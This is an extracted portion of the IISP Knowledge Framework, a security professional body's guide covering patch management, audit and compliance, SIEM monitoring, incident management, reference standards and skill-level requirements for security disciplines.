Professionals and may be used only with express permission of the Institute.
The process starts by identifying vulnerabilities and patches issued by all the vendors used in the system
as well from other sources such as CERTs. The first thing to do is to establish whether the vulnerabilities
are in products within your system. For instance Oracle issue Critical Patch Updates, Security Alerts on a
regular basis. However, this is for all their products. You may determine that some of the products are
not used in your system.
Assuming it is identified that the vulnerability affects your system, then first you need to establish
whether a work around is available. If there is then the associated patches can be applied when the next
routine schedule maintenance occurs. If a work around is not available then a determination needs to
be made as to how high a risk the vulnerability is. If it a high risk then you may want to patch
immediately. If it is not high risk then again it can wait until the next scheduled maintenance. Many
organisations use the CVSS scoring system to determine the level of risk of the vulnerability. As part of
the initial triage you also need to establish if it is viable threat. For example, you would need to establish
if it is worth the effort of addressing a risk from an external attack to a stand-alone system).
Once patches are applied then this needs to be documented.
Whilst this is an overview there are some complexities to it. Before patching any application, device or
operating system you should test it. You really don’t want to deploy an updated application without
testing. For the routine scheduled maintenance then you can factor in that testing does need to be
performed in a pre-production environment. For high risk patches it is more complicated. If the release
procedure indicates that the system requires 3 or 4 days of testing before it can be moved to production
what do you do? It maybe you need to have an emergency procedure such that if it is a critical patch
then it needs to be deployed straight away without testing. This is obviously high risk and it is
recommended that the business signs this off – as a potential business impact is that the system may
crash. If it is not quite so critical then the organisation may be comfortable with taking several days of
testing before deploying into production. If the system needs to be taken off-line for a significant period
of time to apply patches, such as an hour or more, then the business needs to be consulted. It may be
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
Destroy
Store
Archive Use
Share
Answering all these questions will enable an organisation to complete a privacy impact assessment.
The Security Development The Security Development Lifecycle: SDL: A Process for Developing Demonstrably
Lifecycle: More Secure Software (Developer Best Practices). Michael Howard, Steve Lipner.
ISBN 978-07356-2214-2
OWASP ASVS The OWASP Application Security Verification Standard.
https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verific
ation_Standard_Project
Secure Coding
Name Description and Location
SEI CERT Coding Standards https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding
+Standards
Contains standards for C, C++, Java, Perl and Android.
OWASP Secure Coding https://www.owasp.org/index.php/Secure_Coding_Cheat_Sheet
PAS 754 British Standard PAS 754:2014. Software Trustworthiness. Governance and
management. Specification.
http://shop.bsigroup.com/ProductDetail?pid=000000000030284608
Testing
Name Description and Location
OWASP Testing Guide https://www.owasp.org/index.php/OWASP_Testing_Project
Hardening
Name Description and Location
National Cyber Security Guidance.
Centre (NCSC) https://www.ncsc.gov.uk/guidance
National Institute of NIST Special Publication (SP-800) series
Standards and Technology http://csrc.nist.gov/publications/PubsSPs.html
(NIST)
Center for Internet CIS Security Benchmarks
Security (CIS) https://benchmarks.cisecurity.org/
Department of Defence Security Technical Implementation Guides (STIGs)
(DoD) http://iase.disa.mil/stigs/Pages/index.aspx
IISP Knowledge Framework Version 1.0 August 2017 Page 100 of 195
Independent Assurance
Name Description and Location
ISO/IEC 15408 ISO/IEC 15408-1:2009. Information technology -- Security techniques -- Evaluation
criteria for IT security -- Part 1: Introduction and general model.
ISO/IEC 15408-2:2008. Information technology -- Security techniques -- Evaluation
criteria for IT security -- Part 2: Security functional components.
ISO/IEC 15408-3:2008. Information technology -- Security techniques -- Evaluation
criteria for IT security -- Part 3: Security assurance components
CC Certified Products List https://www.commoncriteriaportal.org/products/
CPA Commercial Product Assurance scheme run by NCSC.
https://www.ncsc.gov.uk/document/cpa-scheme-library
CPA Security Security Characteristics published by NCSC.
Characteristics. https://www.ncsc.gov.uk/document/security-characteristics-collection
FIPS 140-2 Federal Information Processing Standards Publication - Security Requirements For
Cryptographic Modules (issue 2) May 25, 2001. Published by NIST
http://csrc.nist.gov/groups/STM/cmvp/standards.html#02
Validated FIPS 140-1 and Published by NIST.
FIPS 140-2 Cryptographic http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm
Modules
CAPS https://www.ncsc.gov.uk/articles/information-about-caps
Patch Management
Name Description and Location
NIST SP 800-40 NIST Special Publication 800-40 Revision 3. Guide to Enterprise Patch
Management Technologies. July 2013
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf
Change Management
Name Description and Location
ITIL https://www.axelos.com/best-practice-solutions/itil/what-is-itil
IISP Knowledge Framework Version 1.0 August 2017 Page 101 of 195
Data Security Lifecycle
Name Description and Location
Data Security Lifecycle Data Security Lifecycle 2.0.
https://www.securosis.com/blog/data-security-lifecycle-2.0
IISP Knowledge Framework Version 1.0 August 2017 Page 102 of 195
2.7. Operational Compliance
In this section we are going to look at various types of techniques that organisations can implement and
invoke to establish whether their ISMS is being effectively and efficiently operated and managed, whilst
complying with relevant legal, statutory and regulations. Relevant regulations and legislation will define
what policies and security controls should be implemented within the ISMS. Independent audits can
establish whether the business and the corresponding ISMS is compliant.
Compliance monitoring allows an organisation to monitor the security controls and associated policies,
especially those that have been defined by the relevant regulatory framework or legal requirements.
Protective monitoring allows an organisation to monitor the system as well as the technical controls.
Any non-compliance detected can be fed into the compliance monitoring process. Both compliance
monitoring and protective monitoring may detect security events – in which case they will be handled
by the incident management process.
Figure 31 illustrates the inter-relationship between these techniques.
2.7.1. Auditing
In ISO/IEC 27000 audit is defined as:
“Systematic, independent and documented process for obtaining audit evidence and evaluating
it objectively to determine the extent to which the audit criteria are fulfilled.”
IISP Knowledge Framework Version 1.0 August 2017 Page 103 of 195
There are actually two types of audit – an internal audit and an external audit. However, in both cases
they need to be performed by independent teams. Many organisations have internal audit teams
although usually they are not focused just on security. In fact security is just a small part of what they
perform.
Audits are performed to ascertain the validity and reliability of information; also to provide an
assessment of a system's security controls. The goal of an audit is to express an opinion of the
organisation or system in question. It is very similar to going through a checklist of security controls and
management processes to establish that they have been implemented and are effective. Usually the
audit teams will audit a system or organisation against a standard, such as ISO/IEC 27001. The standards
do not have to purely about security. For instance the Sarbanes–Oxley Act in the US requires
compliance audits. This US Act protect shareholders and the general public from accounting errors and
fraudulent practices in the enterprise, as well as improve the accuracy of corporate disclosures. Whilst
compliance audits for the Sarbanes–Oxley Act are mainly concerning with accounting and financial
statements it does require the auditors to look at security controls. A compliance audit is sometimes
referred to as a compliance gap analysis.
ISO/IEC 27001 does require compliant organisations to conduct internal audits at planned intervals to
provide information on whether the information security management system conforms to the
organisation’s own requirements for its ISMS; and it has been effectively implemented and maintained.
More details on ISO/IEC 27001 audits and certifications can be found in section 2.3.2. The processes and
requirements for performing ISO/IEC 27001 audits or certifications can be found in ISO/IEC 27006.
The Payment Card Industry Data Security Standard (PCI DSS) requires validation of compliance annually.
This is usually performed by an external Qualified Security Assessor (QSA) or by an Internal Security
Assessor (ISA) that creates a Report on Compliance (ROC) for organisations handling large volumes of
credit card transactions. For organisation handling small volumes it is possible to submit a Self-
Assessment Questionnaire (SAQ).
Many organisations audit their third party suppliers. For instance, cloud service providers. The
standards they use could be ones their have devised themselves, a particular industry standard or based
on standards such as ISO/IEC 27001 or the Payment Card Industry Data Security Standard.
IISP Knowledge Framework Version 1.0 August 2017 Page 104 of 195
• In extreme cases, criminal liability (potentially against individuals rather than just the organisation).
Organisations often discover that adhering to a compliance scheme does generate a number of
benefits, including:
• Reducing the risk of security incidents, saving costs associated with incident response.
• Protecting reputation, when risks are managed more effectively.
• Improving incident response.
• Providing evidence of good governance and risk management.
The compliance monitoring function provides an on-going oversight on the implementation of the
organisation’s policies and security controls. Compliance monitoring is often a combination of manual
checklists as well as IT controls. An example of a manual checklist is looking at the recent new
employees to establish whether they had an employment check, received induction training and signed
an acceptable use policy.
A SIEM platform (which will be discussed in the next section) can also be leveraged for monitoring.
Compliance helps the organisation reduce risk, and the monitoring process can uncover gaps, but
ultimately it is the compliance owner that is accountable for signoff.
Compliance monitoring ensures that evidence is produced demonstrating the effective implementation
of policies, procedures, and controls. It is essential that evidence be collected in a consistent and
comprehensible fashion. If certification is a requirement for the organisation, such as against ISO/IEC
27001, then this documentation can support the certification process.
IISP Knowledge Framework Version 1.0 August 2017 Page 105 of 195
Figure 32 - Security Operations Centre
Typically the SOC would use a Security Information and Event Management (SIEM) platform to provide
real-time analysis of the collected audit events. SIEMs can also be used to assist in post-event forensic
investigations.
Most SIEM platforms combine log management with a powerful analytics engine. The analytics engine
can run complex rules and advanced correlations against incoming event data. Therefore, they can
detect patterns of behaviour that may be undetectable by boundary devices or on single end user
devices. It can also look for events that have been detected across multiple devices, which may signal an
emerging threat.
A SIEM can be used to look for the following:
• Detection of a brute force attack.
• Detection of malware activity.
• Detection of suspicious user behaviour
• Suspicious device behaviour
• Unauthorised system changes
As an example of one of the rules you could configure can be found below when the SIEM is looking for
repeating login attempts:
Goal: Early warning for brute force attacks and password guessing.
Trigger: Alert on 5 or more failed logins in 1 minute on a single user identifier.
Event Sources: Active Directory, Unix/Linux hosts, applications, network switches,
network routers, firewalls.
Most regulatory guidelines require some form of audit event collection and log management function.
SIEMs provide a mechanism to rapidly and easily deploy an audit event collection infrastructure that
directly supports this requirement, and allows instant access to recent audit data, as well as archived log
data. A SIEM can be used to produce reports of various types, including for management. Hence a SIEM
assists in performing compliance monitoring.
Many large organisation also have a Network Operations Centre (NOC). A NOC is used to manage a
network as well as monitoring its health.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 106 of 195
2.7.4. Incident Management
All organisations have to deal with information security incidents – no matter how perfect the security
controls or security awareness programs. Information security incidents come as network attacks from
hackers, virus outbreaks or simply from someone not following procedures. The impact of such an
incident might be a confidentiality breach or maybe a denial of service attack. There may be no harm
done, but an incident can still serve the purpose of highlighting a lack of security awareness or a flaw in
the implementation of security controls.
Information security incident management is concerned with the processes for detecting, reporting,
assessing, responding to, dealing with, and learning from information security incidents. An information
security event could be reported by a member of staff or it could have been detected by protective
monitoring.
Figure 33 shows information security incidents in the context of the risk wheel we showed in the
previous risk management section. A threat exploits vulnerabilities in information systems causing the
occurrence of information security events and thus potentially causing information security incidents to
information assets exposed by the vulnerabilities. Information security incidents compromise the
operations of an organisation.
IISP Knowledge Framework Version 1.0 August 2017 Page 107 of 195
• Information security incidents are assessed and responded to in the most appropriate and efficient
manner.
• Adverse effects of information security incidents on the organisation and its operations are
minimised by appropriate use of security controls as part of incident response.
• Appropriate links with crisis management and business continuity management should be
established as necessary.
• Security vulnerabilities are assessed and dealt with appropriately to prevent or reduce information
security incidents.
• Lessons are learnt quickly from information security incidents, vulnerabilities and their
management. This feedback mechanism is intended to increase the chances of preventing future
information security incidents from occurring, improve the implementation and use of security
controls, and improve the overall information security incident management plan.
ISO/IEC 27035 defines that there are five distinct phases in incident management, as shown in the
following figure:
IISP Knowledge Framework Version 1.0 August 2017 Page 108 of 195
Forensics concerns the gathering of digital evidence that could be used in a court of law, employment
tribunal or similar. A key concept in digital forensics (or any form of forensics) is the continuity of
evidence, which is sometimes referred to as chain of custody. Continuity of evidence ensures that there
is a witnessed, written record of all of the individuals who maintained unbroken control over items of
physical or digital evidence. A key principle of gathering digital evidence is that no action should change
data held on a computer or storage media which may subsequently be relied upon in court. For hard
disk drives this means taking a secure copy of the original disk drive that potentially holds digital
evidence that could be used in a court proceeding.
Digital Forensics support is not required for every incident. However, until you start an assessment of an
incident it is not always apparent. To undertake a forensics investigation is a specialist skill – with few
organisations having an in-house capability. During the Plan and Prepare phase this should be taken
into account and ideally a Forensics Readiness Plan created. Part of the plan would be who to contact
externally if you need to access forensics expertise.
Auditing
Name Description and Location
ISO/IEC 27006 ISO/IEC 27006:2015. Information technology — Security techniques —
Requirements for bodies providing audit and certification of information
security management systems.
PCI DSS Payment Card Industry (PCI). Data Security Standard Requirements and
Security Assessment Procedures.
https://www.pcisecuritystandards.org/pci_security/
Compliance Monitoring
Name Description and Location
PCI DSS Payment Card Industry (PCI). Data Security Standard Requirements and
Security Assessment Procedures.
https://www.pcisecuritystandards.org/pci_security/
COBIT Control Objectives for Information and Related Technologies
https://www.isaca.org/COBIT/Pages/default.aspx
SOX The Sarbanes–Oxley Act of 2002, also known as the "Public Company
Accounting Reform and Investor Protection Act" and "Corporate and Auditing
Accountability, Responsibility, and Transparency Act"
https://www.gpo.gov/fdsys/pkg/PLAW-107publ204/pdf/PLAW-
107publ204.pdf
Protective Monitoring
Name Description and Location
NONE
IISP Knowledge Framework Version 1.0 August 2017 Page 109 of 195
Incident Management
Name Description and Location
ISO/IEC 27035-1:2016 Information technology -- Security techniques -- Information security incident
management -- Part 1: Principles of incident management
ISO/IEC 27035-2:2016 Information technology -- Security techniques -- Information security incident
management -- Part 2: Guidelines to plan and prepare for incident response
IISP Knowledge Framework Version 1.0 August 2017 Page 110 of 195
3. Knowledge Levels
In this section we take the principles stated in the IISP Skills Framework plus the requirements for Level
1 and Level 2 and then expand upon the requirements for knowledge and understanding.
In the following pages we provide a table for each Skill Area within each Security Discipline in the IISP
Skills Framework with each table containing:
IISP Knowledge Framework Version 1.0 August 2017 Page 111 of 195
Security Disciple Information Security Governance and Management
Skill Area Governance Ref: A1
Directs, oversees, designs. Implements or operates within the set of multi-disciplinary structures, policies,
procedures, processes and controls implemented to manage Cyber and Information Security at an Enterprise
level, supporting an organisation's immediate and future regulatory, legal, risk, environmental and operational
requirements and ensuring compliance with those requirements
Level 1 Level 2
Can describe the principles of Information Security Can explain the basic principles of Information Security
Governance. Governance and how it applies within an organisation.
Can list the potential impacts that occur where poor
Information Governance has been observed.
They shall be able to describe: They shall be able to explain:
• The importance of governance structures. • Approaches for establishing and monitoring good
• Information governance within an organisation governance within an organisation.
and key bodies and membership. • The importance of Board level support and
responsibilities.
• Key governance legislation/regulation e.g. UK
Companies Act.
• Statutory, regulatory and advisory requirements.
• The potential business impact of poor information
governance.
IISP Knowledge Framework Version 1.0 August 2017 Page 112 of 195
Security Disciple Information Security Governance and Management
Skill Area Policy & Standards Ref: A2
Directs, develops or maintains organisational Cyber and Information Security policies, standards and processes
using recognised standards (e.g. the ISO/IEC 27000 family, the Security Policy Framework) where appropriate.
Applies recognised Cyber and Information Security standards and policies within an organisation, programme,
project or operation.
Level 1 Level 2
Can describe the main policies and standards relevant Can explain the main concepts of the main
to the Information Security discipline and/or Information Security policies and standards. This might
organisation. include experience of applying knowledge of
Information Security policies and standards in a
training or academic environment, for example
through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test
or examination.
IISP Knowledge Framework Version 1.0 August 2017 Page 113 of 195
Security Disciple Information Security Governance and Management
Skill Area Information Security Ref: A3
Strategy
Directs, develops or maintains plans and processes to manage Cyber and Information Security risks
appropriately and effectively, whilst complying with legal, statutory, contractual, and business requirements.
Level 1 Level 2
Can describe the purpose of Information Security Can explain the basic principles of Information Security
strategies and how they can benefit the business. Strategy and how it applies within an organisation.
They shall be able to name one security strategy in an They shall be able to explain the purpose of security
organisation. strategies and potential business benefits.
They shall be able to describe the purpose of a They shall be able to explain the different elements in
security strategy. a typical strategy.
They shall be able to explain the business benefits of
one strategy.
They shall be able to explain the factors influencing
the development of a strategy.
IISP Knowledge Framework Version 1.0 August 2017 Page 114 of 195
Security Disciple Information Security Governance and Management
Skill Area Innovation & Business Ref: A4
Improvement
Recognises potential strategic application of Cyber and Information Security and initiates investigation and
development of innovative methods of protecting information assets, to the benefit of the organisation and the
interface between business and information security.
Exploits opportunities for introducing more effective secure business and operational processes.
Level 1 Level 2
Can list the potential impacts of poor Information Can explain how good Cyber and Information Security
Security and the business benefits of Information strategies and processes can benefit the business, and
Security. provide examples.
They shall be able to recognise potential impact on a They shall be able to explain the business benefits of
business due to poor information security. improving information security and provide several
examples.
They shall be able to explain how implementing an
ISMS can provide business improvement.
They shall be able to explain how a security strategy
could benefit a business.
IISP Knowledge Framework Version 1.0 August 2017 Page 115 of 195
Security Disciple Information Security Governance and Management
Skill Area Behavioural Change Ref: A5
Identifies Cyber and Information Security awareness, training and culture management needs in line with
security strategy, business needs and strategic direction, and gains management commitment and resources to
support these needs.
Manages the development or delivery of Cyber and Information Security awareness and training, behavioural
analysis programmes and/or security culture management programmes, applying analysis of human factors as
appropriate.
Level 1 Level 2
Recognises the role of Information Security awareness Can explain the concepts of Information Security
and training, and can list the benefits of behavioural awareness and security culture management and give
analysis and security culture management in examples of good practice.
maintaining good IS.
They shall be able to list several security policies that They shall be able to explain security awareness
all users should be aware of. training that should be present in a typical
They shall be able to list several examples of where organisation.
poor security awareness caused a business impact They shall be able to explain to non-IS staff the
They shall be able to describe security weaknesses in a importance of security awareness and the potential
typical organisation. impacts to the business.
They shall be able to explain different techniques for
delivering and measuring behavioural change.
IISP Knowledge Framework Version 1.0 August 2017 Page 116 of 195
Security Disciple Information Security Governance and Management
Skill Area Legal & Regulatory Ref: A6
Environment and
Compliance
Understands the legal and regulatory environment within which the business operates.
Ensures that Information Security Governance arrangements are appropriate.
Ensures that the organisation complies with legal and regulatory requirements.
Level 1 Level 2
Can describe the major legislative and regulatory Can explain the principal requirements of major
instruments relevant to Information Security (e.g. Data legislation and regulations relevant to Information
Protection Act, privacy, healthcare, ISO/IEC 27000 Security, and those legal and regulatory instruments
family) and legislation and regulation relevant to own relevant to own work.
work.
They shall be able to list the major applicable They shall be able to explain:
legislation and regulations affecting an example • In reasonable detail all of the applicable
organisation and describe their overall purpose. legislation and regulation pertinent to an
They shall be able to name or describe who in an organisation.
organisation they should go to consult about
• The consequences of non-compliance with major
legislation and regulation.
legislation and regulation.
They should be able to explain when an organisation is
non-compliant with major legislation and regulation.
They shall be able to explain how legislation or
regulations could influence governance arrangements
within an organisation.
IISP Knowledge Framework Version 1.0 August 2017 Page 117 of 195
Security Disciple Information Security Governance and Management
Skill Area Third Party Management Ref: A7
Identifies and advises on the technical, physical, personnel and procedural risks associated with third party
relationships, including systems development and maintenance, outsourced service providers and business
partners.
Assesses the level of confidence that third party Cyber and Information Security capabilities/services operate as
defined.
Level 1 Level 2
Recognises the need for organisations to manage the Can explain the main security issues associated with
Information Security of third parties and can describe third party relationships and how these can be
the impacts of failure to do so. managed effectively.
They shall be able to describe the consequences to an They shall be able to explain the relevant legislation
organisation of failing to manage third parties and regulations that third parties must comply with –
effectively. and why.
They shall be able to list the relevant legislation and They shall be able to explain the relevant polices and
regulations that third parties must comply with. standards that third parties must comply with – and
They shall be able to list the relevant polices and why.
standards that third parties should comply with. They shall be able to summarise the relevant
contractual terms and conditions of an Information
Security nature in third party contracts in their
business area.
IISP Knowledge Framework Version 1.0 August 2017 Page 118 of 195
Security Disciple Threat Assessment and Information Risk Management
Skill Area Threat Intelligence and Ref: B1
Assessment, and Threat
Modelling
Assesses and validates information on current and potential Cyber and Information Security threats to the
business, analysing trends and highlighting information security issues relevant to the organisation, including
Security Analytics for Big Data.
Processes, collates and exploits data, taking into account its relevance and reliability to develop and maintain
‘situational awareness’.
Predicts and prioritises threats to an organisation and their methods of attack.
Analyses the significance and implication of processed intelligence to identify significant trends, potential threat
agents and their capabilities.
Predicts and prioritises threats to an organisation and their methods of attack.
Uses human factor analysis in the assessment of threats.
Uses threat intelligence to develop attack trees.
Prepares and disseminates intelligence reports providing threat indicators and warnings.
Level 1 Level 2
Can describe the concepts and principles of threat Can explain the principles of threat intelligence,
intelligence, modelling and assessment. modelling and assessment. This might include
experience of applying threat intelligence, modelling
and assessment principles in a training or academic
environment, for example through participation in
syndicate exercises, undertaking practical exercises,
and/or passing a test or examination.
They shall be able to describe the purpose of threat They shall be able to describe different types of threat
modelling. models. – including attack trees.
They shall be able to describe the concept of a threat They shall be able to describe a number of threats to
and a threat agent. an organisation.
They shall be able to describe a number of threat
agents to an organisation.
They shall be able to explain the role of threat
intelligence and threat modelling in undertaking risk
assessments.
IISP Knowledge Framework Version 1.0 August 2017 Page 119 of 195
Security Disciple Threat Assessment and Information Risk Management
Skill Area Risk Assessment Ref: B2
Identifies and assesses information assets; uses this information and relevant threat assessments, business
impacts, business benefits and costs to conduct risk assessments and identify potential vulnerabilities.
Level 1 Level 2
Can describe the concepts and principles of risk Can explain the principles of risk assessment. This
assessment. might include experience of applying risk assessment
principles in a training or academic environment, for
example through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test
or examination.
They shall be able to describe risk components such They shall be able to explain in detail at least one risk
as: information risk, asset, threat agent, vulnerability, assessment methodology.
impact and likelihood. They shall be to explain sources of threat to an
They shall be able to list at least one risk management organisation.
methodology. They shall be able to explain the role of threat
They shall be able to list sources of information on intelligence and threat modelling in undertaking risk
threats and vulnerabilities. assessments.
They shall be able explain different types of
vulnerabilities within a typical organisation
IISP Knowledge Framework Version 1.0 August 2017 Page 120 of 195
Security Disciple Threat Assessment and Information Risk Management
Skill Area Information Risk Ref: B3
Management
Develops Cyber and Information Security risk management strategies and controls, taking into account business
needs and risk assessments, and balancing technical, physical, procedural and personnel controls.
Level 1 Level 2
Can describe the concepts and principles of Can explain the principles of risk management. This
Information Security risk management. might include experience of applying risk management
principles in a training or academic environment, for
example through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test
or examination.
They shall be able to list different types of controls to They shall be able to explain in detail one risk
manage risks. management methodology and the associated
They shall be able to describe the difference between processes.
technical, physical, procedural and personnel controls. They shall be able to explain the following terms and
They shall be able to describe the difference between their relationship:
risk assessment and risk treatment. • Residual Risk.
They shall be able to name at least one risk • Risk Acceptance.
management methodology. • Risk Avoidance.
• Risk Retention.
• Risk Sharing.
• Risk Tolerance.
• Risk Appetite.
They shall be able to explain different types of
controls to mitigate risks
IISP Knowledge Framework Version 1.0 August 2017 Page 121 of 195
Security Disciple Implementing Secure Systems
Skill Area Enterprise Security Ref: C1
Architecture
Working with Enterprise Architects, takes customer security requirements and assists in the development of an
Enterprise Security Architecture.
Interprets relevant security policies and threat/risk profiles into secure architectural solutions that mitigate the
risks and conform to legislation and relate to business needs.
Applies common architectural frameworks (e.g. TOGAF, SABSA).
Presents security architecture solutions as a view within broader IT architectures.
Maintains awareness of the security advantages and vulnerabilities of common products and technologies.
Designs robust and fault-tolerant security mechanisms and components appropriate to the perceived risks.
Develops and implements appropriate methodologies, templates, patterns and frameworks.
Level 1 Level 2
Can describe the concept of an enterprise Information Can explain the concept of an enterprise Information
Security architecture and how it can be used to reduce Security architecture, how it relates to business needs
information risk. and how it can be used to reduce information risk. This
might include experience of applying these concepts in
a training or academic environment, for example
through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test
or examination.
Can describe how an enterprise security architecture They shall be able to explain at least one common
can relate to business needs. architectural framework and provide pros and cons of
They shall be able to name at least one common that framework.
architectural framework. They shall be able to describe at least one design
They shall be able to name at least one design pattern and explain the business benefits.
pattern. They shall be able to explain how legislation,
regulations and policies can influence an Enterprise
Security Architecture.
IISP Knowledge Framework Version 1.0 August 2017 Page 122 of 195
Security Disciple Implementing Secure Systems
Skill Area Technical Security Ref: C2
Architecture
Contributes to the development of Computer, Network and Storage Security Architecture, incorporating
hosting, infrastructure applications and cloud based solutions as covered by the role of Chief Security Architect.
Interprets relevant security policies and threat/risk profiles into secure architectural solutions that mitigate the
risks and conform to legislation and relate to business needs.
Presents security architecture solutions as a view within broader IT architectures.
Applies security architecture principles to networks, IT systems, Control Systems (e.g. SCADA, ICS),
infrastructures and products.
Devises standard solutions that address requirements delivering specific security functionality whether for a
business solution or for a product.
Maintains awareness of the security advantages and vulnerabilities of common products and technologies.
Designs robust and fault-tolerant security mechanisms and components appropriate to the perceived risks.
Uses appropriate methodologies and frameworks.
Level 1 Level 2
Can describe the principles of a technical security Can explain the principles of a computer system,
architecture and how these can be used to reduce network or storage security architecture and how
information risk. these can be used to reduce information risk. This
might include experience of applying these concepts in
a training or academic environment, for example
through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test
or examination.
They shall be able to list a number of different They shall be able to explain a wide range of different
technical security controls and describe their purpose. technical security techniques, mechanisms and
They shall be able to name several important security technologies, including:
design principles. • Access control.
They shall be able to recognise the importance of • Auditing and alerting.
secure configuration and hardening and their role in • Content control.
building secure systems.
• Cryptography.
• Detection.
• Identification and Authentication.
• Security Management.
• Trusted communications.
They shall be able to explain at least one design
pattern.
They shall be able to explain a number of different
security design principles such as:
• Defence in depth.
• Compartmentalise.
• Least Privilege.
• Separation of Duties.
• Secure the Weakest Link.
• Fail Securely.
• Principle of Least Privilege.
• Minimisation.
They shall be able to explain the purpose of secure
configuration and hardening and their role in building
secure systems.
IISP Knowledge Framework Version 1.0 August 2017 Page 123 of 195
Security Disciple Implementing Secure Systems
Skill Area Secure Development Ref: C3
Implements secure systems, products and components using an appropriate methodology.
Defines and/or implements secure development standards and practices including, where relevant, formal
methods.
Selects and/or implements appropriate test strategies.
Defines and/or implements appropriate secure change and fault management processes.
Verifies that a developed component, product or system meets its security criteria (requirements and/or policy,
standards & procedures).
Specifies and/or implements processes that maintain the required level of security of a component, product, or
system through its lifecycle.
Manages a system or component through a formal security assessment.
Level 1 Level 2
Recognises the benefits of addressing security during Can explain the benefits of addressing security during
system development and can list some of the tools, system development.
products and practices that contribute to secure Can describe some of the tools, products and practices
development. that contribute to secure development.
They shall be able to list the typical stages of a They shall be able to explain the Security
Security Development Lifecycle and the role of Development Lifecycle used within an organisation.
security within each stage: They shall be able to explain the tools in use and their
• Requirements. role in the Security Development Lifecycle.
• Design. They shall be able to explain the purpose of secure
• Implementation. coding standards.
They shall be able to explain the purpose of different
• Verification.
type of testing such as functional testing, static code
• Release.
analysis and fuzzing.
They shall be able to describe the benefits of
They shall be able to describe the personnel,
introducing security early into the development
procedural, physical, and technical security necessary
lifecycle.
for a secure development site.
They shall be able to name who in an organisation
they should go to consult about secure development
and/or what development practices are in place.
They shall be able to list a number of secure coding
standards used by an organisation.
They shall be able to describe different type of testing
such as functional testing, static code analysis and
fuzzing
IISP Knowledge Framework Version 1.0 August 2017 Page 124 of 195
Security Disciple Assurance, Audit, Compliance and Testing
Skill Area Internal and Statutory Ref: D1
Audit
Verifies that information systems and processes meet the security criteria (requirements or policy, standards
and procedures).
Assesses the business benefits of security controls.
Level 1 Level 2
Can describe the requirements for and basic principles Can explain the main principles and processes involved
involved in conducting security audits of information in conducting an audit. This might include experience
systems. of applying these principles in a training or academic
environment, for example through participation in
syndicate exercises, undertaking practical exercises,
and/or passing a test or examination.
They shall be able to describe the overall process of an They shall be able to explain in detail the process of an
audit. audit.
They shall be able to list a number of standards that They shall be able to explain how an audit can test
audits can be performed against. compliance with policy, standards, procedures and
controls.
They shall be able to explain an auditing standard (e.g.
ISO/IEC 27001)
IISP Knowledge Framework Version 1.0 August 2017 Page 125 of 195
Security Disciple Assurance, Audit, Compliance and Testing
Skill Area Compliance Monitoring Ref: D2
and Controls Testing
Defines and implements processes to verify on-going conformance to security and/or regulatory requirements.
Carries out security compliance checks in accordance with an appropriate methodology.
This Skill covers compliance checks and tests against technical, physical, procedural and personnel controls.
Level 1 Level 2
Can describe the benefits of compliance monitoring Can explain the main principles and processes involved
and list the common compliance monitoring in conducting a compliance monitoring exercise. This
standards, e.g. ISO/IEC 27001, PCI/DSS, IAMM. might include experience of applying these principles
in a training or academic environment, for example
through participation in syndicate exercises,
undertaking practical exercises, and/or passing a test
or examination.
They shall be able to name at least one standard in They shall be able to explain in detail at least one
this area and what business areas they would be common standard in this area.
typically be applied to. They shall be able to describe how compliance
They shall be able to describe the benefits of monitoring could be achieved against different
compliance monitoring. controls.
IISP Knowledge Framework Version 1.0 August 2017 Page 126 of 195
Security Disciple Assurance, Audit, Compliance and Testing
Skill Area Security Evaluation and Ref: D3
Functionality Testing
Contributes to the security evaluation or testing of software.
Evaluates security software by analysing the design documentation and code to identify potential vulnerabilities
and testing to ascertain whether these are exploitable.
Tests the security functionality of systems or applications for correctness in line with security policies, standards
and procedures, and advises on corrective measures.
Applies recognised evaluation/testing methodologies, tools and techniques, developing new ones where
appropriate.
Assesses the robustness of a system, product or technology.
Applies commonly accepted governance practices and standards when testing in an operational environment.
Level 1 Level 2
Can describe the principal concepts of security Can explain the principal concepts of security
evaluation and functional testing to support evaluation or functional testing and how these are
Information Security. applied in practice. This might include experience of
applying these concepts in a training or academic
environment, for example through participation in
syndicate exercises, undertaking practical exercises,
and/or passing a test or examination.
Recognises that security testing cannot guarantee They shall be able to explain the typical structure of a
security. security test plan.
They shall be able to describe the difference between They shall be able to explain a number of tools in use
white box and black box testing. by an organisation.
They shall be able to recognise the difference They shall be able to explain the purpose of a number
between positive and negative testing. of independent assurance schemes.
They shall be able to recognise the difference
between testing application functionality, code,
vulnerability assessments and penetration testing.
They shall be able to describe the purpose of
independent assurance.
They shall be able to name at least one independent
assurance scheme.
IISP Knowledge Framework Version 1.0 August 2017 Page 127 of 195
Security Disciple Assurance, Audit, Compliance and Testing
Skill Area Penetration Testing Ref: D4
Contributes to the scoping and conduct of vulnerability assessments and tests for public domain vulnerabilities
and assessment of the potential for exploitation, where appropriate by conducting exploits. Reports potential
issues and mitigation options.
Contributes to the review and interpretation of reports. Co-ordinates and manages Remediation Action Plan
(RAP) responses
This skill covers, but is not limited to, penetration testing against networks and infrastructures, web
applications, mobile devices and control systems.
Level 1 Level 2
Can describe the principles of penetration testing and Can explain the principles, the main components of an
list the common types of penetration test – e.g. infrastructure penetration test and the high level
infrastructure, web applications, etc. Recognises the processes involved. This might include recognised
difference between a vulnerability assessment and a training in infrastructure penetration testing involving
penetration test practical exercises in using these skills.
They shall be able to recognise the difference They shall be able to explain the structure and content
